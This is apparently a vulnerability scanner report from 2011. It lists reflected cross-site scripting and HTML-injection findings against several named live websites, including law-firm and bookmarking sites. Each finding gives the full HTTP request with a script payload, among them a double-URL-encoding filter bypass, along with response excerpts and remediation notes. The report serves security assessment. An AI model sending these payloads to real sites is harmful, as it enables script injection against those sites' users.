GET /rss/publications/rss.xmld7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 was submitted in the REST URL parameter 1. This input was echoed as 53325"><script>alert(1)</script>5cfc2555b00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /x2253325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.303. http://www.wileyrein.com/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.wileyrein.com
Path: /x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b894"><script>alert(1)</script>8dd0074b00e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /x22?4b894"><script>alert(1)</script>8dd0074b00e=1 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 74302<img%20src%3da%20onerror%3dalert(1)>9c7a66be0e0 was submitted in the REST URL parameter 1. This input was echoed as 74302<img src=a onerror=alert(1)>9c7a66be0e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Washington-DC74302<img%20src%3da%20onerror%3dalert(1)>9c7a66be0e0/Attorneys HTTP/1.1 Host: www.yellowpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56576"><script>alert(1)</script>eda13df7848 was submitted in the Referer HTTP header. This input was echoed as 56576\"><script>alert(1)</script>eda13df7848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: gc.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=56576"><script>alert(1)</script>eda13df7848
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:08:53 GMT Server: Apache/2.2.10 (CentOS) X-Pingback: http://gc.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 121965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <a href="http://duodra.co/post/seu-ambiente-de-trabalho-em-7-itens/" onclick="urchinTracker('/outgoing/duodra.co/post/seu-ambiente-de-trabalho-em-7-itens/?referer=http://www.google.com/search?hl=en&q=56576\"><script>alert(1)</script>eda13df7848');"> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload f8d51--><script>alert(1)</script>e2c96b26918 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET / HTTP/1.1 Host: gc.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f8d51--><script>alert(1)</script>e2c96b26918
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:02 GMT Server: Apache/2.2.10 (CentOS) X-Pingback: http://gc.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 121965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <a href="http://www.devinrio.com.br" onclick="urchinTracker('/outgoing/www.devinrio.com.br?referer=http://www.google.com/search?hl=en&q=f8d51--><script>alert(1)</script>e2c96b26918');"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3aa4"><script>alert(1)</script>5b3e569b7ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /lab/innerfade/ HTTP/1.1 Host: medienfreunde.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: f3aa4"><script>alert(1)</script>5b3e569b7ac
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:52 GMT Server: Apache X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 14733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <!-- saved from url=(0013)about:internet --> <hea ...[SNIP]... <iframe src="http://pingomatic.com/ping/?title=Gestaltung+von+Flyern&blogurl=f3aa4"><script>alert(1)</script>5b3e569b7ac&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1fbc"-alert(1)-"4da742fdffd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domainserve/domainView HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e1fbc"-alert(1)-"4da742fdffd
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff5f"><script>alert(1)</script>3d126670e87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5ff5f"><script>alert(1)</script>3d126670e87
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:39 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92849
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=5ff5f"><script>alert(1)</script>3d126670e87" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload aef4b<script>alert(1)</script>c275ed0f500 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=aef4b<script>alert(1)</script>c275ed0f500
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:39 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 92835
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>aef4b<script>alert(1)</script>c275ed0f500 - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56449"><a>3c0af12941a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arnoldporter.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=56449"><a>3c0af12941a
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18264165;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/ Set-Cookie: CFTOKEN=19385056;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a813"><a>7b216e3e1ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_diversity_our_values.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=1a813"><a>7b216e3e1ad
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7be1"><a>6b37d6049c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_pro_bono_our_commitment.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=a7be1"><a>6b37d6049c6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18dcd"><a>1951d83601 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_recognition.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=18dcd"><a>1951d83601
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e576"><a>6afa9807f84 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_recognition_rankings.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=7e576"><a>6afa9807f84
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d86c8"><a>12209855120 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_who_we_are.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=d86c8"><a>12209855120
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:26:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c51"><a>3e7a64ab71 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /advisory.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=47c51"><a>3e7a64ab71
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f57f0"><a>27be33cf6b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /careers.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=f57f0"><a>27be33cf6b9
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:26:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a4c"><a>7d008f3eaa6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /contact.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=f5a4c"><a>7d008f3eaa6
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8d2"><a>935e63f487b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /events.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=1e8d2"><a>935e63f487b
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d1f7'-alert(1)-'2b3427d18c5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
